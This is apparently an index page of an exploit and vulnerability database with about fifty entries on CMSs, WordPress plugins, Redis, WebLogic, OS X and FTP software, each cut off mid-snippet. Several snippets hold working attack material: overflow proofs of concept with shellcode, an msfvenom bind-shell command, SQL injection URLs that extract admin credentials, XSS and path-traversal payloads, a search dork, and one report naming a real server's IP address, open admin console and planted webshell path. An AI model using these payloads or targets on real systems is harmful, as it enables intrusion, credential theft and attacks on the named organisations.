56796 matches found
金蝶某系统上传漏洞导致GETSHELL(已成养马场)
简要描述: wooyun的审核大哥,麻烦审核下http://www.wooyun.org/bugs/wooyun-2015-0138341/trace/59330513063ee2e0ce62e5655bd17f0e,提交有一段时间了.....3Q!!! 详细说明: 上传漏洞导致getshell,发现已经成了养马场,泄露了2007年2015年所有用户的用户名密码。 漏洞证明: 金蝶在线考试系统:http://exam.kingdee.com/,存在上传漏洞导致getshell。 该系统登录首页界面: 存在漏洞的上传页面,可直接上传jsp文件。...
yuyou hudongpingtai /Components/news/FileDown.aspx 任意文件下载
No description provided by source...
Redis 未授权访问 PoC
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。redis 默认不需要密码即可访问,黑客直接访问即可获取数据库中所有信息,造成严重的信息泄露。...
Boxoft WAV to MP3 Converter - convert 特性缓冲区溢出
首先拿到poc,先看看,明显的溢出,利用的是SEH的结构 !/usr/bin/python using=utf-8 f = open"malicious.aiff", "w" f.write"A"4132 f.write"\xeb\x06\x90\x90"nseh f.write"\xa4\x43\x40\x00"seh Shellcode: windows/exec - 277 bytes CMD=calc.exe f.write"\x90"20 f.write"\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"...
DedeCMS V5.7 SP1 /member/mtypes.php SQL注入漏洞
No description provided by source...
Star-net SVG6000 /cgi-bin/Form_AddPlusUser 安全模式绕过
No description provided by source...
WordPress dzs-zoomsounds Plugins 2.0 /admin/upload.php 文件上传
No description provided by source...
金蝶EAS /portal/logoImgServlet 任意文件下载
No description provided by source...
Watu PRO 4.8.8.4 - CSRF
Assuming there is a quiz with ID 1, the following link will delete it when visited by a logged-in admin:http://localhost/wp-admin/admin.php?page=watuproexams&action=delete&quiz=1...
WordPress <= 4.2 - Stored XSS
Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3. Tested with MySQL versions 5.1.53 and 5.5.41. OverviewCurrent versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed...
Oracle WebLogic SSRF And XSS
CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jspAffected Software: Oracle Fusion Middleware 10.0.2, 10.3.6Oracle WebLogic web server is often both a externally accessible; and b permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be...
YesWiki 0.2 /wakka.php Path Traversal Vulnerability
Date: 2015-09-02 Exploit Author: HaHwul Exploit Author Blog: http://www.codeblack.net Vendor Homepage: http://yeswiki.net Software Link: https://github.com/YesWiki/yeswiki Version: yeswiki 0.2 Tested on: Debian Wheezy CVE :...
WordPress LeagueManager Plugins 3.9.11 /lib/core.php SQL注入
No description provided by source...
ProFTPd 1.3.5 文件复制
No description provided by source...
Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities
EDB-ID: 37349Author: Francis ProvencherPublished: 2015-06-23介绍===============Adobe PS图象处理软件是光栅图形编辑器的开发和Windows和OS...
WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection
Exploit Title: WordPress cp-multi-view-calendar.1.1.7 Unauthenticated SQL injection vulnerabilities Date: 2015-07-10 Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar Vendor Homepage: http://wordpress.dwbooster.com/ Software Link:...
Discuz 3.2 /static/js/bbcode.js 跨站脚本漏洞
No description provided by source...
v5shop SQL commond.aspx SQL注入漏洞
简要描述 V5Shop网店系统是上海威博旗下一款B2C网上开店软件产品,适合中小型企业及个人快速构建个性化网上商店。该程序V5shop8.2存在通杀SQL注入漏洞且非常严重,可直接爆出管理员帐号密码,后台上传也可做任何过滤。 利用EXP: /commond.aspx?id=1 and 1=select top 1 name from webadmin 上面这个可以直接显示出管理员用户名 /commond.aspx?id=1 and 1=select top 1 pass from webadmin 上面这个可以显示MD5密码 默认后台地址: /weblogin/Login.aspx...
Apple MAC OS X < 10.9/10 - Local Root Exploit
/ osx-irony-assist.m Copyright c 2010 by [email protected] Apple MACOS X 10.9/10? local root exploit by mu-b - June 2010 - Tested on: Apple MACOS X = 10.8.X $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $ The most ironic backdoor perhaps in the history of backdoors. Enabling 'Assistive...
Seagate Business NAS 2014.00319 system/libraries/Session.php 代码执行
No description provided by source...
DaHanCMS 2014 VerifyCodeServlet 登录绕过漏洞
No description provided by source...
Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution
No description provided by source...
用友某系统Websphere直接登录Getshell
简要描述: 可以直接进入WEBSPHERE管理后台getshell 详细说明: http://211.144.131.98/ 漏洞地址 https://211.144.131.98:9043/ibm/console/ 未设置admin密码可以进入后台直接getshell 输入admin进入后台 根据园长这篇文章 http://drops.wooyun.org/tips/604 后台getshell 木马地址 http://211.144.131.98:9080/safetest/index.jsp 上传菜刀马 地址...
nginx 0.5.6 - 1.7.4 SSL session vulnerable
No description provided by source...
Hikvision web 弱口令
No description provided by source...
0375平顶山建站系统SQL注入漏洞
搜索关键词:技术支持:0375网 默认后台admin 万能密码'or'='or' 其中包括很多政府,学校,企业,政府。 还有多处: http://example.com/class.asp?classid=xx...
OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation
DYLDPRINTTOFILE local privilege escalation vulnerability in OS X 10.10 - 10.10.4 !/bin/sh Simple Proof of Concept Exploit for the DYLDPRINTTOFILE local privilege escalation vulnerability in OS X 10.10 - 10.10.4 C Copyright 2015 Stefan Esser Wait months for a fix from Apple or install the followin...
PHP News Script 4.0.0 - SQL Injection
Exploit Title: PHP News Script 4.0.0 Sql Injection Date: 2015-08-01 Version: 4.0.0 Tested on: CentOSExploit :http://server/allgallery.php?id=-9999%27+sql-command+%23 Test :http://server/demo/allgallery.php?id=-100%27+union+select+user%23 !/usr/bin/env python coding: utf-8 from pocsuite.net import...
SiteFactory CMS 5.5.9 任意文件下载漏洞
漏洞详情:SiteFactory CMS 5.5.9 存在任意文件下载漏洞。问题链接:sitefactory/assets/download.aspx?file=测试链接:/sitefactory/assets/download.aspx?file=c%3a\windows\win.ini影响版本:SiteFactory CMS 5.5.9...
TurboCRM /pub/bgtaskreq.php SQL注入
No description provided by source...
GeniXCMS 0.0.3 - XSS Vulnerabilities
漏洞标题:持续性XSS 厂商主页: genixcms.org 软件链接: genixcms.org 版本: 0.0.3 测试于: windows 7 类别: web应用 厂商:=============================================genixcms.org产品:=====================================================GeniXCMS v0.0.3 是一个基于PHP的管理系统 咨询信息:===================================================多个持续型&反射型...
QiboCMS /member/special.php SQL注入
No description provided by source...
XerCMS 20150528 /XerCMS/Modules/member/index.php SQL注入
No description provided by source...
Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
CVE-ID: CVE-2014-7883Affected versions: UCMDB 10.10 Other versions might also be affected The HP Universal CMDB UCMDB automatically collects and manages accurate andcurrent business service definitions, associated infrastructure relationships anddetailed information on the assets, and is a centra...
Hikvision telnet 弱口令
No description provided by source...
Yahoo! Messenger 11.5.0.228 Buffer Overflow
ADVISORY INFORMATION-----------------------Product: Yahoo! MessengerVendor URL: www.yahoo.comType: Stack-based Buffer Overflow CWE-121Date found: 2014-05-02Date published: 2015-09-03CVSSv3 Score: 4,8 AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:LCVE: CVE-2014-7216 VERSIONS AFFECTED--------------------Yahoo!...
WordPress WP Symposium插件SQL注入漏洞
WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。WP Symposium是其中的一个社交网络插件。WordPress WP Symposium插件 15.8之前版本中 存在 SQL注入漏洞 .该漏洞源于getalbumitem.php脚本没有充分过滤‘size’参数。远程攻击者可利用该漏洞执行任意SQL命令。CNNVD编号: CNNVD-201508-432CVE编号: CVE-2015-6522...
WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload
WordPress插件 , Responsive Thumbnail Slider Plugin 1.0,任意文件上传。这个漏洞非常严重,涉及到很多WordPress主题。这个任意文件上传漏洞,不需要与管理员发生互动,而且不需要有管理员的权限,甚至不需要普通用户的账号密码,就能完成这个攻击。 For Exploiting This Vulnerability : Go To Add Image Section And Upload File By Self Plugin Uploader Then Upload File With Double Extension Image And B...
Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp
Title:CVE-2015-5617Enorth Webpublisher CMS SQL Injection from deletependingnews.jsp cbNewsidVendor:http://products.enorth.com.cn/bfnrglxt/index.shtmlEnorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education a...
Filezilla Client 2.2.X - SEH Buffer Overflow Exploit
No description provided by source. !/usr/bin/env python2 coding: utf-8 import os,socket,threading,time import traceback visit: ly0n.me greetz: NBS MSGBOX "BrokenByte" msgbox = "\x68\x6e\x33\x72\x00\x68\x75\x74" "\x69\x30\x68\x5e\x58\x65\x63\x89" "\xe3\x68\x20\x20\x20\x00\x68\x68"...
Bedita 3.5.1 - XSS Vulnerabilities
No description provided by source. Title: Bedita 3.5.1 XSS vulnerabilites Application: Bedita Version: 3.5.1 Software Link: http://www.bedita.com/ Date: 2015-03-09 Author: Sébastien Morin Contact: https://twitter.com/SebMorin1 Category: Web Applications =================== Introduction:...
Cyberoam - Blind SQL Injection
Description The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database. The username field is vulnerable to the following types of SQL Injections a Boolean-based blind sql injection b Stacked...
PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow
No description provided by source. !/usr/bin/python import socket import sys msfvenom -p windows/shellbindtcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby Payload size: 352 bytes shellcode =...
Yiqicms 存储型XSS
yiqicms 最新版的1.9 留言区,跟1.8版本一样存在相同的问题。在评论区中对标题仅仅限制了30个字符长度的限制,没有进行任何。 if!pregmatch"/^.1,30$/",$msgtitle ShowMsg"请输入正确的标题"; exit; if!pregmatch"/^.1,10$/",$msgname ShowMsg"请输入您的姓名"; exit; if!pregmatch"/^.1,20$/",$msgcontact ShowMsg"请输入正确的联系方式"; exit; if!pregmatch"/^.1,200$/",$msgcontent...
齐博分类系统远程代码执行漏洞
影响版本:分类1.0/do/jf.php文件7-16行,存在潜在的代码执行漏洞。$query = $db-query"SELECT FROM $prejfsort ORDER BY list";while$rs = $db-fetcharray$query $fnameDB$rsfid=$rsname; $query2 = $db-query"SELECT FROM $prejfabout WHERE fid='$rsfid' ORDER BY list"; while$rs2 = $db-fetcharray$query2 eval"$rs2title="$rs2title";";...
MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit
No description provided by source. % Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoint, "0x", "" PackDWORD = PackDWORD & UnEscape"%...
PhpWiki 1.5.4 Cross Site Scripting / Local File Inclusion
1/ 跨站点脚本漏洞跨站点脚本漏洞允许未经身份验证的远程用户通过GET或POST 参数将任意网页脚本注入代码。Example url:http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--Example request:POST /phpwiki/index.php/UserPreferences HTTP/1.1Host: 192.168.0.10User-Agent: Mozilla/5.0...
FHFS - FTP/HTTP File Server 2.1.2 远程命令执行
No description provided by source. !/usr/bin/python FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution Author: Naser Farhadi Date: 26 August 2015 Version: 2.1.2 Tested on: Windows 7 SP1 32 bit Link : http://sourceforge.net/projects/fhfs/ Description : FHFS is a FTP and HTTP Web Server...
Opera 31.0.1889.174 XSS Filter Bypass
Full Explanation Opera browser is a famous browser in internet and for this reason the opera company should secure the browser to users. one of this security issues is the Anti-XSS. The Anti-XSS stops executing javascript and today i'm going ro bypass it. Fist, make a vulnerable PHP file EX:...
HUAWEI MobiConnect 23.9.17.216 - Privilege Escalation
A local privilege escalation vulnerability has been discovered in the official HUAWEI MobiConnect 23.009.17.00.216 software. The local security vulnerability allows an attackers to gain higher access privileges by execution of arbitrary codes in connection with dll hijacking. The security risk of...